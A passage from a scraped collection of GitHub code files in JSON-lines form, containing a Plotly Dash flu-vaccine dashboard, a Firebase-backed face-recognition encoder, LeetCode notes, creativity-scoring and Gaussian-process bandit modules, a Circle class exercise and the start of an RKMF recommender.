/data['count'].sum()*100).round()\n\ndata1 = df.groupby([\"h1n1_vaccine\"],as_index=True)[\"h1n1_vaccine\"].count().reset_index(name=\"count\")\ndata1['Percentage'] = (data1['count'] /data1['count'].sum()*100).round()\n\ndata2 = df.groupby([\"seasonal_vaccine\"],as_index=True)[\"seasonal_vaccine\"].count().reset_index(name=\"count\")\ndata2['Percentage'] = (data2['count'] /data2['count'].sum()*100).round()\n\ndata3 = df.groupby([\"doctor_recc_h1n1\",\"h1n1_vaccine\"],as_index=True)[\"doctor_recc_h1n1\"].count().reset_index(name=\"count\")\ndata3['Percentage'] = (data3['count'] /data3['count'].sum()*100).round()\n\ndf_dist_h1n1 = df.h1n1_vaccine.value_counts(normalize=True).round(2).rename_axis('Vacc').reset_index(name='counts')\ndf_dist_seas = df.seasonal_vaccine.value_counts(normalize=True).round(2).rename_axis('Vacc').reset_index(name='counts')\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\n\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# this is needed by gunicorn command in procfile\nserver = app.server\n\n\n'''def get_figure(filter= None):\n chart_data =[]\n \n if filter == \"not_vaccinated\":\n chart_data = [\n go.Bar(name='Not vaccined', x=data.query('h1n1_vaccine == 0')['h1n1_concern'], y=data.query('h1n1_vaccine == 0')['Percentage']),\n ]\n\n elif filter == \"vaccinated\":\n chart_data = [\n go.Bar(name='Vaccined', x=data.query('h1n1_vaccine == 1')['h1n1_concern'], y=data.query('h1n1_vaccine == 1')['Percentage'])\n ]\n\n else: \n chart_data = [\n go.Bar(name='Not vaccined', x=data.query('h1n1_vaccine == 0')['h1n1_concern'], y=data.query('h1n1_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccined', x=data.query('h1n1_vaccine == 1')['h1n1_concern'], y=data.query('h1n1_vaccine == 1')['Percentage'])\n ]\n\n fig_plot = go.Figure(data=chart_data,\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig_plot.update_layout(barmode='group')\n fig_plot.update_xaxes(title='Concern of H1N1',\n ticktext=['Not at all concerned 1', 'Not very concerned', 'Somewhat concerned', 'Very concerned'],\n tickmode='array', tickvals = [0,1, 2, 3])\n fig_plot.update_yaxes(title='Percentage of vaccinations')\n \n return fig_plot\n\nfig = get_figure()\n'''\n\ndef get_figure(filter= None):\n chart_data =[]\n\n if filter == \"h1n1_vaccines\":\n chart_data = [\n go.Bar(name=\"H1N1 vaccines\", x=df_dist_h1n1.Vacc, y=df_dist_h1n1.counts, \n marker_color='rgb(25,25,112)', text=df_dist_h1n1.counts, textposition='auto')\n ]\n\n elif filter == \"seasonal_flu_vaccine\":\n chart_data = [\n go.Bar(name=\"Seasonal flu vaccine\", x=df_dist_seas.Vacc, y=df_dist_seas.counts, \n marker_color='rgb(188,143,143)', text=df_dist_seas.counts, textposition='auto')\n ] \n\n else: \n chart_data = [\n go.Bar(name=\"H1N1 vaccines\", x=df_dist_h1n1.Vacc, y=df_dist_h1n1.counts, \n marker_color='rgb(25,25,112)', text=df_dist_h1n1.counts, textposition='auto'),\n \n go.Bar(name=\"Seasonal flu vaccine\", x=df_dist_seas.Vacc, y=df_dist_seas.counts, \n marker_color='rgb(188,143,143)', text=df_dist_seas.counts,textposition='auto')\n ]\n\n fig_plot = go.Figure(data=chart_data,\n layout=go.Layout(template=\"simple_white\"))\n\n\n # Change the bar mode\n fig_plot.layout = dict(title='Vaccination Status in Sample', \n # This code removes the 3.0 from the plot (which was shown although value was dropped):\n #xaxis = dict(type=\"category\", categoryorder='category ascending')\n )\n fig_plot.update_xaxes( \n ticktext=[\"Not vaccinated\", \"Vaccinated\"], \n tickmode='array', tickvals = [0,1],\n tickangle=0,tickfont_size=14\n )\n fig_plot.update_yaxes(title='Share within sample')\n\n return fig_plot\n\nfig = get_figure()\n\n\n\n\n\n# Creating plots for the distribution of our target(H1N1) variables \n\n\n'''def get_figure_targets_H1N1():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data1.query('h1n1_vaccine == 0')['h1n1_vaccine'], y=data1.query('h1n1_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccinated', x=data1.query('h1n1_vaccine == 1')['h1n1_vaccine'], y=data1.query('h1n1_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of the H1N1 Target',\n ticktext=['Vaccinated', 'Not Vaccinated'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_H1N1 = get_figure_targets_H1N1()'''\n\n\n\n\n'''# Creating plots for the distribution of our target(Seasonal) variables \n\ndef get_figure_targets_Seas():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data2.query('seasonal_vaccine == 0')['seasonal_vaccine'], y=data2.query('seasonal_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccinated', x=data2.query('seasonal_vaccine == 1')['seasonal_vaccine'], y=data2.query('seasonal_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of the Seasonal Flu Target',\n ticktext=['Vaccinated', 'Not Vaccinated'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_Seas = get_figure_targets_Seas()'''\n\n\n# Creating plots for the distribution of people with recommendation that shows both vaccinated and not vaccinated\n\n\ndef get_figure_targets_doc_recc():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data3.query('h1n1_vaccine == 0')['doctor_recc_h1n1'], y=data3.query('h1n1_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccinated', x=data3.query('h1n1_vaccine == 1')['doctor_recc_h1n1'], y=data3.query('h1n1_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of people with doctor´s recommendation for H1N1',\n ticktext=['Recommended', 'Not Recommended'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_H1N1_doc_recc = get_figure_targets_doc_recc()\n\n\ndef get_default_bar(data):\n return px.bar(data)\n\ndefault_bar= get_default_bar(data)\n\n\ndefault_bar = get_figure()\napp.layout = html.Div(\n \n\n children=[\n \n html.H2(\n id=\"title\",\n children=\"Flushot Interactive Dashboard\",\n ),\n html.H1(children=\"\"),\n html.Div(\n children=[\n html.H2(\"Inputs\"),\n html.Div(\n children=[\n html.P(\"Vaccination_Distribution\"),\n dcc.Dropdown(\n id=\"Distribution-dropdown\",\n options=[\n {\"label\": \"Both\", \"value\": \"both\"},\n {\"label\": \"H1N1 vaccines\", \"value\": \"h1n1_vaccines\"},\n {\"label\": \"Seasonal flu vaccine\", \"value\": \"seasonal_flu_vaccine\"},\n ],\n value=\"both\",\n ),\n ],\n ),\n \n ],\n\n # mit style kann man CSS-Formatierungen verwenden\n style={\n \"backgroundColor\": \"#DDDDDD\",\n \"maxWidth\": \"800px\",\n \"padding\": \"10px 20px\",\n },\n ), \n html.Div(\n children=[\n html.H2(\"bar-chart\"),\n dcc.Graph(id=\"bar-chart\", figure=default_bar),\n ],\n \n ),\n\n\n #html.Button(\"Submit\", id=\"textarea-state-example-button\", n_clicks=0),\n #html.\n html.Div(id=\"textarea-state-example-output\", style={\"whiteSpace\": \"pre-line\"}),\n #dcc.Graph(id=\"bar-chart\", figure=fig),\n #dcc.Graph(id=\"bar-chart_1\", figure=fig_targets_H1N1),\n #dcc.Graph(id=\"bar-chart_2\", figure=fig_targets_Seas),\n #dcc.Graph(id=\"bar-chart_3\", figure=fig_targets_H1N1_doc_recc),\n ]\n)\n\n# https://dash.plotly.com/basic-callbacks\n@app.callback(\n \n #Output(\"textarea-state-example-output\", \"children\"),\n Output(\"bar-chart\", \"figure\"),\n \n Input(\"Distribution-dropdown\", \"value\"), #Input(\"n-input\", \"value\")],\n #State(\"Distribution-dropdown\", \"value\"),\n)\ndef update_output(value):\n\n return get_figure(value)\n\n\n\n# Add the server clause:\nif __name__ == \"__main__\":\n app.run_server()\n\n\n\n\n\n\n \n","repo_name":"RayKwame/fight-the-flu-dash","sub_path":"app_initial.py","file_name":"app_initial.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19045010398","text":"import cv2\r\nimport face_recognition\r\nimport pickle\r\nimport os\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import db\r\nfrom firebase_admin import storage\r\nfrom PIL import Image\r\n\r\n\r\ncred = credentials.Certificate(\"serviceAccountKey.json\")\r\nfirebase_admin.initialize_app(cred,{ #this format is used as we're working with JSON format\r\n 'databaseURL':\"https://faceattendance-18c5a-default-rtdb.firebaseio.com/\",\r\n 'storageBucket': \"faceattendance-18c5a.appspot.com\",\r\n})\r\n\r\n\r\n# # Specify the path of the folder containing the images\r\n# folder_path = 'images'\r\n#\r\n# # Create a new folder to store the resized images\r\n# if not os.path.exists('Resized Images'):\r\n# os.makedirs('Resized Images')\r\n#\r\n# # Loop through all the images in the folder\r\n# for filename in os.listdir(folder_path):\r\n# image_path = os.path.join(folder_path, filename)\r\n#\r\n# # Open the image and resize it to 216x216\r\n# with Image.open(image_path) as img:\r\n# img = img.resize((216, 216))\r\n#\r\n#\r\n# # Save the image in PNG format to the \"Resized Images\" folder\r\n# new_image_path = os.path.join('Resized Images', filename.replace(\".jpg\", \"\").replace(\".jpeg\", \"\").replace(\".JPG\", \"\").replace(\".png\", \"\") + \".png\")\r\n# img.save(new_image_path, \"PNG\")\r\n#\r\n# print(\"Resized Complete\")\r\n\r\n#Importing student images\r\nfolderPath = 'Preprocessed Images' #path for the resized images\r\npathList = os.listdir(folderPath)\r\nprint(pathList)\r\nimgList = []\r\nstudentIds = []\r\nfor path in pathList:\r\n imgList.append(cv2.imread(os.path.join(folderPath, path)))\r\n #print(imgList)\r\n print(path)\r\n print(os.path.splitext(path)[0]) #obtaining the ids from the file name\r\n studentIds.append(os.path.splitext(path)[0])\r\n\r\n fileName = f'{folderPath}/{path}'#creates a folder called images in storage\r\n bucket = storage.bucket()\r\n blob = bucket.blob(fileName) #for sending\r\n blob.upload_from_filename(fileName)\r\n\r\n\r\n\r\nprint(studentIds)\r\n\r\ndef findEncodings(imagesList):\r\n encodeList = []\r\n for img in imagesList:\r\n # openCV uses BGR but facial recognition uses RGB\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n #find encodings\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode) #Loops through to save all encodings of the images\r\n\r\n return encodeList\r\n\r\n\r\nprint(\"Encoding Started ...\") #takes a while if there are a lot of images\r\nencodeListKnown = findEncodings(imgList)\r\nencodeListKnownWithIds = [encodeListKnown, studentIds] #the two lists to be stored in the pickle file\r\nprint(encodeListKnownWithIds) #prints the encodings of the images\r\nprint(\"Encoding Complete\")\r\n\r\n#storing the encodings with Ids in the pickle file so that we can import it while we're using the webcam\r\nfile = open(\"EncodeFile.p\", 'wb')\r\npickle.dump(encodeListKnownWithIds, file)\r\nfile.close()\r\nprint(\"File Saved\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EstherMamai/Facial-recognition-","sub_path":"EncodeGenerator.py","file_name":"EncodeGenerator.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459591261","text":"\n\"\"\"\nAlgorithms:\n1. Brute Force\n2. Sliding window\n3. Two pointers \n\"\"\"\n\n\n\ndsa = dict()\ndsa[0] = (\"10.2\", \"LeetCode 1 - Two sum\")\ndsa[1] = (\"10.5\", \"LeetCode 217 - Contains Duplicate\")\ndsa[2] = (\"10.7\", \"LeetCode 48 - Rotate Image\")\ndsa[3] = (\"40.373\", \"LeetCode 110 - Balanced Binary Tree\")\ndsa[4] = (\"40.374\", \"LeetCode 98 - Validate Binary Search Tree\")\ndsa[5] = (\"40.375\", \"LeetCode 285 - In-order Successor in BST\")\ndsa[6] = (\"40.377\", \"LeetCode 236 - Lowest Common Ancestor of a Binary Tree\") # not finish yet \n\n\nalgorithms = dict()\nalgorithms[0] = (15, \"LeetCode 283\", \"Move zeros\")\nalgorithms[1] = (21, \"LeetCode 881\", \"Boats to Save People\")\nalgorithms[2] = (26, \"LeetCode 941\", \"Valid Mountain Array\")\nalgorithms[3] = (31, \"LeetCode 11\", \"Container with most water\")\nalgorithms[4] = (38, \"LeetCode 3\", \"Longest Substring without repeating\")\nalgorithms[5] = (41, \"LeetCode 34\", \"Find first and last position of element in sorted array\")\nalgorithms[6] = (48, \"LeetCode 278\", \"First bad version\")\nalgorithms[7] = (53, \"LeetCode 268\", \"Missing number\")\nalgorithms[8] = (59, \"LeetCode 204\", \"Count Primes\")\nalgorithms[9] = (65, \"LeetCode 136\", \"Single number\")\nalgorithms[10] = (71, \"LeetCode 657\", \"Robot return to origin\")\nalgorithms[11] = (74, \"LeetCode 67\", \"Add Binary\")\nalgorithms[12] = (84, \"LeetCode 1\", \"Two sum\")\nalgorithms[13] = (91, \"LeetCode 217\", \"Contains Duplicate\")\nalgorithms[14] = (94, \"LeetCode 169\", \"Majority Element\")\nalgorithms[15] = (97, \"LeetCode 49\", \"Group Anagrams\")\nalgorithms[16] = (100, \"LeetCode 454\", \"4Sum II\")\nalgorithms[17] = (105, \"LeetCode 146\", \"LRU Cache\") \nalgorithms[18] = (113, \"LeetCode 76\", \"Minimum Window Substring\") # from collections import OrderedDict, deque\nalgorithms[19] = (123, \"LeetCode 21\", \"Merge Two sorted lists\") \nalgorithms[20] = (126, \"LeetCode 141\", \"Linked List Cycle\") \nalgorithms[21] = (129, \"LeetCode 206\", \"Reverse Linked List\")\nalgorithms[22] = (132, \"LeetCode 2\", \"Add Two Numbers\")\nalgorithms[23] = (135, \"LeetCode 19\", \"Remove Nth Node From End of List\")\nalgorithms[24] = (138, \"LeetCode 328\", \"Odd Even Linked List\")\nalgorithms[25] = (141, \"LeetCode 23\", \"Merge K Sorted Lists\") # not finished yet\nalgorithms[26] = (143, \"LeetCode 78\", \"Subsets\")\nalgorithms[27] = (145, \"LeetCode 17\", \"Letter Combinations of a Phone Number\")\nalgorithms[28] = (147, \"LeetCode 79\", \"Word Search\") # not finished yet \nalgorithms[29] = (194, \"LeetCode 236\", \"Lowest Common Ancestor of a Binary Tree\") # ?\nalgorithms[30] = (214, \"LeetCode 198\", \"House Robber\") # divide and conqer, dynamic \n\n\n\ngoogle = dict()\ngoogle[0] = (150, \"Evaluate Reverse Polish Notation\") # use stack\ngoogle[1] = (299, \"Bulls and Cows\") # use hash, because only 10 digits, can use [0] * 10 too\ngoogle[2] = (359, \"Logger Rate Limiter\")\ngoogle[3] = (366, \"Find Leaves of Binary Tree\")\ngoogle[4] = (384, \"Shuffle an Array\") # Fisher-Yates algorithm \ngoogle[5] = (394, \"Decode String\") # use stack, be careful about the order appending str, \n# ppl complain it should be hard, but i solved it easily. 2022-02-27Sun 00:00:30\ngoogle[6] = (418, \"Sentence Screen Fitting\")\ngoogle[7] = (528, \"Random Pick with Weight\")\ngoogle[8] = (539, \"Minimum Time Difference\")\ngoogle[9] = (593, \"Valid Square\")\ngoogle[10] = (652, \"Find Duplicate Subtrees\") # hash all nodes\ngoogle[11] = (690, \"Employee Importance\")\ngoogle[12] = (777, \"Swap Adjacent in LR String\")\ngoogle[13] = (792, \"Number of Matching Subsequences\")\ngoogle[14] = (794, \"Valid Tic-Tac-Toe State\")\ngoogle[15] = (833, \"Find And Replace in String\")\ngoogle[16] = (900, \"RLE Iterator\")\ngoogle[17] = (939, \"Minimum Area Rectangle\")\ngoogle[18] = (954, \"Array of Doubled Pairs\")\ngoogle[19] = (990, \"Satisfiability of Equality Equations\")\ngoogle[20] = (1048, \"Longest String Chain\")\n\n\n\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"*DSA/LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11818346913","text":"import pandas as pd\nimport spacy\nimport numpy as np\nfrom transform_data_by_response import transform_data_by_response\nfrom fluency import calc_fluency\nfrom flexibility_elaboration import calc_flexibility_and_elaboration, calc_flexibility_and_elaboration_multi_target\nfrom originality import calc_originality\n\n\ndef z_score(array):\n \"\"\"Convert array of numbers to Z scores\"\"\"\n return (array - np.nanmean(array)) / np.std(array)\n\n\ndef mean_by_subject(by_subject_df, by_response_df, variable):\n \"\"\"Calculate the mean score by subject (variable 'ID' in both by_subject_df and by_response_df\n\n Arguments\n ---------\n by_subject_df: pandas dataframe\n output dataframe (one row per subject, column 'ID' has subject IDs)\n by_response_df: pandas dataframe\n input dataframe (one row per response, multiple responses per subject, column 'ID' has subject IDs)\n variable: str\n column name of data to average in by_response_df\n\n Returns\n -------\n pandas series\n new column to add to by_subject_df containing the mean of 'variable' by subject\n \"\"\"\n return by_subject_df.apply(\n lambda row:\n np.nanmean(by_response_df.loc[by_response_df.ID == row.ID, variable]),\n axis=1\n )\n\n\ndef calc_all_creativity(data_by_response, target_word=None, nlp=None, output_prefix='', multi_target=False):\n \"\"\" Calculate fluency, flexibility, elaboration, and originality. Then Z score and calculate creativity score\n\n This function calls fluency.py, flexibility_elaboration.py, and originality.py to calculate the four\n divergent thinking metrics. Flexibility, elaboration, and originality are calculated for each response, then\n Z scored and averaged within each participant. Fluency is calculated for each participant and then Z scored.\n Each participant's Z scored flexibility, elaboration, originality, and fluency are then averaged into a single\n score (labeled 'creativity_score').\n\n Arguments\n ---------\n data_by_response: pandas dataframe\n dataframe as created by transform_data_by_response.py. One row per response with columns 'responseID', 'ID',\n and 'response'. If multi_target is True, there should also be a 'target_word' column\n target_word: str, optional\n task's target word, used to calculate flexibility in flexibility_elaboration.py.\n Should be string if multi_target is False, and list if multi_target is True\n nlp: Spacy model, optional\n output from spacy.load(). If not provided, will load 'en_vectors_web_lg'.\n output_prefix: str, optional\n prefix to use for column names in output. (default no prefix)\n multi_target: bool, optional\n True if responses use different target words, False if all responses use the same target word. (default False)\n\n Returns\n -------\n {\n results_by_subject: pandas dataframe\n dataframe with one row per subject containing each subject's average z scored originality, flexibility,\n and elaboration, raw and z-scored fluency, and creativity_score\n results_by_response: pandas dataframe\n dataframe with one row per response containing cleaned responses, and both raw and z scored originality,\n flexibility, and originality\n }\n \"\"\"\n if (target_word is None) & (not multi_target):\n raise TypeError(\n \"If the task has a single target word, provide a target_word argument. If there are multiple target words, \"\n + \"set the multi_target argument to True and make sure data_by_response has a 'target_word' column\")\n\n if nlp is None:\n print('Loading spacy model: en_vectors_web_lg')\n nlp = spacy.load('en_vectors_web_lg')\n # make sure prefix ends in _ if there is one\n if not (output_prefix.endswith('_') | (output_prefix == '')):\n output_prefix = output_prefix + '_'\n\n results_df = pd.DataFrame({'responseID': data_by_response.responseID, 'ID': data_by_response.ID})\n print('Calculating fluency using fluency.py')\n results_df['fluency'] = calc_fluency(data_by_response, nlp)\n print('Calculating elaboration and flexibility using flexibility_elaboration.py')\n results_df[['clean_response', 'elaboration', 'flexibility']] = \\\n calc_flexibility_and_elaboration(list(data_by_response.response), target_word, nlp) if not multi_target else \\\n calc_flexibility_and_elaboration_multi_target(list(data_by_response.response),\n list(data_by_response.target_word),\n nlp)\n print('Calculating originality using originality.py')\n results_df['originality'] = calc_originality(data_by_response.response)\n\n print('Z-scoring and concatenating results')\n results_df['z_elaboration'] = z_score(results_df.elaboration)\n results_df['z_flexibility'] = z_score(results_df.flexibility)\n results_df['z_originality'] = z_score(results_df.originality)\n\n results_by_subject = pd.DataFrame({'ID': results_df.ID.unique()})\n elab_out_name, flex_out_name, orig_out_name, flue_out_name, creativity_out_name = [\n output_prefix + n for n in ['elaboration', 'flexibility', 'originality', 'fluency',\n 'creativity_score']]\n results_by_subject[elab_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_elaboration')\n results_by_subject[elab_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'elaboration')\n results_by_subject[flex_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_flexibility')\n results_by_subject[flex_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'flexibility')\n results_by_subject[orig_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_originality')\n results_by_subject[orig_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'originality')\n\n results_by_subject[flue_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'fluency')\n results_by_subject[flue_out_name + '_z'] = z_score(results_by_subject[flue_out_name + '_raw'])\n\n results_by_subject[creativity_out_name] = results_by_subject[[elab_out_name + '_z',\n flex_out_name + '_z',\n orig_out_name + '_z',\n flue_out_name + '_z']].mean(axis=1)\n\n print('Done calculating all creativity metrics\\n')\n\n return {'results_by_subject': results_by_subject, 'results_by_response': results_df}\n\n","repo_name":"jnmildner/unusual-uses-analysis","sub_path":"calc_all_creativity.py","file_name":"calc_all_creativity.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20841018375","text":"# https://leetcode.com/problems/running-sum-of-1d-array/\nclass Solution:\n def runningSum(self, nums: list) -> list:\n \"\"\"\n >>> Solution().runningSum(nums=[1,2,3,4])\n [1, 3, 6, 10]\n >>> Solution().runningSum(nums=[1,1,1,1,1])\n [1, 2, 3, 4, 5]\n >>> Solution().runningSum(nums=[3,1,2,10,1])\n [3, 4, 6, 16, 17]\n \"\"\"\n arr = []\n sum = 0\n for n in nums:\n sum += n\n arr.append(sum)\n return arr\n","repo_name":"markplotlib/data-structures","sub_path":"primitives/running_sum.py","file_name":"running_sum.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180137402","text":"#!/usr/bin/python\n\"\"\"\n@author: Iñigo Urteaga\n\"\"\"\n\n# Imports: python modules\nimport pdb\n# Gaussian process with pytorch\nimport gpytorch\n\n# Exact (non-contextual) GP model class\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, \n a, y, \n mean_function, kernel_function,\n likelihood\n ):\n # Init Exact GP model\n super(ExactGPModel, self).__init__(a, y, likelihood)\n \n # Init all modules\n self.mean_module = mean_function\n self.covar_module = kernel_function\n\n def forward(self, a):\n mean_a = self.mean_module(a)\n covar_a = self.covar_module(a)\n return gpytorch.distributions.MultivariateNormal(mean_a, covar_a)\n\n# Exact Contextual GP model class\nclass ExactContextualGPModel(gpytorch.models.ExactGP):\n def __init__(self,\n gp_input, y,\n d_context,\n mean_functions, kernel_functions, action_context_composition,\n likelihood\n ):\n # Init Exact GP model\n super(ExactContextualGPModel, self).__init__(gp_input, y, likelihood)\n \n # Figure out dimensionality of context and actions\n self.d_context=d_context\n \n # Init all modules\n self.mean_modules = mean_functions\n self.covar_modules = kernel_functions\n self.action_context_composition= action_context_composition\n \n def forward(self, gp_input): \n if self.action_context_composition is None:\n # Action and context are modeled jointly\n mean=self.mean_modules['joint'](gp_input)\n covar=self.covar_modules['joint'](gp_input)\n \n else:\n # Action and context are modeled separately\n # Separate context and actions\n x = gp_input[:,:self.d_context]\n a = gp_input[:,self.d_context:]\n \n # Context Mean\n mean_x = self.mean_modules['context'](x)\n # Action Mean\n mean_a = self.mean_modules['action'](a)\n \n # Context kernel\n covar_x = self.covar_modules['context'](x)\n # Action kernel\n covar_a = self.covar_modules['action'](a)\n \n # Combine\n if self.action_context_composition == 'add':\n mean = mean_x + mean_a\n covar = covar_x + covar_a\n elif self.action_context_composition == 'product':\n mean = mean_x * mean_a\n covar = covar_x * covar_a\n else:\n raise ValueError('Action/context composition={} not implemented yet'.format(self.action_context_composition))\n \n # Return Multivariate Normal with computed mean and covariance\n return gpytorch.distributions.MultivariateNormal(mean, covar)\n\n","repo_name":"iurteaga/gp_ts_nlp","sub_path":"bandits/gp_models.py","file_name":"gp_models.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15499509630","text":"# part 1\n# Create a Circle class with a constructor that requires a single argument. \n# This argument should be the radius of the circle.\n\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n\ncircle = Circle(10)\nprint(\"circle, expecting '10' (radius):\", circle.radius)\n\n# part 2\n# Create a completely different version of your Circle class that requires \n# a single argument. This time, allow the developer to specify whether the \n# value supplied is the diameter or the radius of the circle. \n# You should only store the Circle's radius.\n\nclass Circle2:\n def __init__(self, size = {}):\n if \"radius\" in size:\n self.radius = size[\"radius\"]\n elif \"diameter\" in size:\n self.radius = size[\"diameter\"] / 2\n else:\n self.radius = False\n\ncircle2withRadius = Circle2({\"radius\": 10})\ncircle2withDiameter = Circle2({\"diameter\": 22})\ncircle2withNoArg = Circle2()\ncircle2withBadKey = Circle2({\"bad\": 3})\n\nprint(\"circle 2, with radius, expecting '10' (radius):\", circle2withRadius.radius)\nprint(\"circle 2, with diameter, expecting '11' (radius):\", circle2withDiameter.radius)\nprint(\"circle 2, with no arg, expecting 'False' (radius):\", circle2withNoArg.radius)\nprint(\"circle 2, with bad key, expecting 'False' (radius):\", circle2withBadKey.radius)\n\n# part 3\n# - ruby instructions -\n# Modify your constructor to make use of the kind_of? method. \n# Your Circle class supports both setting a radius as the exclusive, \n# numeric argument to the constructor and the ability to specify a diameter \n# or radius as an option. This portion will combine the functionalities of \n# both parts I and II.\n# - python version -\n# Same as above, but using Python's type checking: type(arg) is int/dict\n\nclass Circle3:\n def __init__(self, size = {}):\n if type(size) is dict:\n if \"radius\" in size:\n self.radius = size[\"radius\"]\n elif \"diameter\" in size:\n self.radius = size[\"diameter\"] / 2\n else:\n self.radius = False\n elif type(size) is int:\n self.radius = size\n else:\n self.radius = False\n\ncircle3withDict = Circle3({\"radius\": 10})\ncircle3withInt = Circle3(6)\ncircle3withNoArg = Circle3()\n\nprint(\"circle 3, given '{radius: 10}', expecting '10' (radius):\", circle3withDict.radius)\nprint(\"circle 3, given '6', expecting '6' (radius):\", circle3withInt.radius)\nprint(\"circle 3, given no args, expecting 'False' (radius):\", circle3withNoArg.radius)","repo_name":"jefferyshivers/launch-academy-week1-python","sub_path":"circle-constructor/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10872039884","text":"\"\"\"Este módulo contiene la implementación de RKMF\n con Kernel lineal y non-negative constraints\n utilizada en el taller\n\"\"\"\nimport math\nimport numpy as np\nfrom surprise import AlgoBase\nfrom surprise import PredictionImpossible\n\nclass RKMFAlgorithm(AlgoBase):\n \"\"\"Clase que implementa RKMF con Kernel lineal y non-negative constraints\"\"\"\n def __init__(self, n_factors=100, n_epochs=20, lr=0.005, reg=0.02, noise=0.01):\n \"\"\"Se inicializa el algoritmo con los hiper-parámetros dados por parámetro.\n Se inicializan adicionalmente los demás factores a utilizar en RKMF con valores temporales\n Parámetros:\n n_factors: Número de factores que tendrán las matrices de usuarios e ítems.\n n_epochs: Número de epochs en los que se aplicará el Stochastic Gradient Descent.\n lr: El learning rate del modelo.\n reg: El valor de regularización del modelo.\n noise: Valor que se utiliza a la hora de inicializar las matrices de usuarios x factores\n e ítems x factores.\n \"\"\"\n self.n_factors = n_factors\n self.n_epochs = n_epochs\n self.lr = lr\n self.reg = reg\n self.noise = noise\n\n # Se inicializan los distintos factores relevantes en el algoritmo\n # con valores temporales\n self.init_low = 0.0\n self.init_high = 5.0\n self.kernel_a = 3.0\n self.kernel_c = 1\n self.pu = None\n self.qi = None\n AlgoBase.__init__(self)\n\n\n def fit(self, trainset):\n \"\"\"Entrena el modelo con la información dada en un dataset de entrenamiento\"\"\"\n AlgoBase.fit(self, trainset)\n self.define_trainset_derived_attributes(trainset)\n self.sgd(trainset)\n return self\n\n\n def define_trainset_derived_attributes(self, trainset):\n \"\"\"Define los valores de los factores relevantes para el \n modelo a los que se les asignaron valores temporales\n \"\"\"\n # Se calcula el rating mínimo y el rating máximo para poder definir\n # el valor de a, c y el rango de valores donde se inicializarán los\n # valores de la matriz de usuarios x factores e ítems x factores\n r_min = None\n r_max = None\n for _, _, rating in trainset.all_ratings():\n if r_min is None or rating < r_min:\n r_min = rating\n if r_max is None or rating > r_max:\n r_max = rating\n # Se definen a y c siguiendo la recomendación dada en el paper\n # Estos valores son usados para realizar la predicción de ratings\n self.kernel_a = r_min\n self.kernel_c = r_max - r_min\n # Se calcula el rango de valores donde se inicializarán los valores de las matrices\n # teniendo en cuenta la recomendación dada en el paper y el noise dado por parámetro\n k = self.n_factors\n g = trainset.global_mean\n init_base = math.sqrt((g - r_min)/(k * (r_max - r_min))) + self.noise\n self.init_low = init_base - self.noise\n if self.init_low < 0:\n self.init_low = 0\n self.init_high = init_base + self.noise\n\n\n def sgd(self, trainset):\n \"\"\"Implementación de SGD para realizar la factorización de la matriz de utilidad\"\"\"\n rng = np.random.mtrand._rand\n # Se inicializa la matriz de usuarios y la matriz de ítems con valores aleatorios\n # en el intervalo definido anteriormente\n pu = rng.uniform(self.init_low, self.init_high, size=(trainset.n_users, self.n_factors))\n qi = 